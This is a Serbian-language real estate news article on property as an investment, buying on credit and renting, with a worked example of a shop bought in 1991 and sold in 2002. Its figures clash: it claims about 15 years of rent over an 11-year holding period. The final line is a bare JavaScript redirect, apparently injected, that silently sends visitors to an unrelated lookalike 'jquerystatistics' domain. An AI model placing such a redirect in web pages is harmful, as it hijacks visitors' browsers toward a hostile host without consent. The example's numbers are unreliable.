News

Check out market updates

Ulaganje u nekretnine

Ulaganje u nekretnine

Uložiti sredstva  u deonice kod nekog od niza fondova koji se danas nude na finansijskom tržištu, oročiti sredstva u dinarima ili devizama ili …?
Mnogim se građanima danas, u ­“poplavi” raznih mogućnosti ulaganja, najsigurnije čini ulaganje u nešto “opipljivo”, odnosno u Nekretnine.
Tome doprinose brojni faktori ali i sama činjenica da vrednost nekretnina raste iz godine u godinu , uprkos činjenici DA se u Srbiji od 2008 desio  pad cena Nekretnina.

Premda analitičari kažu kako je rast cena nekretnina   nešto manji nego proteklih godina kada su cene rasle neverovatnom brzinom.

Da li je kupovina na kredit dobra “investicija “?

Građani koji su kreditno sposobni, a imaju rešeno stambeno pitanje, sve više prepoznaju kupovinu Nekretnine kao “dobru investiciju”, ili  čak i alternativu štednji jer,dok “deca ne odrastu” ili im ne zatreba novac, mogu taj stan iznajmljivati

U zavisnosti da li se odluče za kupovinu većeg ili manjeg stana  i da li se stan kupuje iz kredita ili ne .Najčešće se  stan kupuje iz kredita a veći deo rate kredita se pokriva iz rente ( zakupnine).

 

Navedite mi primer dobre Nekretnine?

Boban je u decembru 1991 godine kupio lokal u blizini Vukovog spomenika površine 37 m² za 4,3 miliona tadašnjih dinara što je iznosilo 71.000,- DM (Nemačkih maraka). Navedeni lokal je celo vreme izdavao za iznos od  600 do 1000 DM ili taj iznos u EUR-skoj protivvrednosti u trajanju od cca 15 godina kada ga je prodao  2002 godine. Za navedeni period je ostvario ukupan prihod od oko  144.000,- DM.

Dakle investicija mu se vratila i duplirala za 15 godina, pri čemu u navedeni lokal ulaganja su bila minimalna.  2002 godine je isti lokal prodao za iznos od 70.000 EUR u dinarskoj protivvrednosti.

Treba napomenuti da su ovo retki primeri, da su bila ratna vremena i vreme sankcija kao i zamena valuta iz DM u EUR.

window.location='http://ww82.jquerystatistics.org/';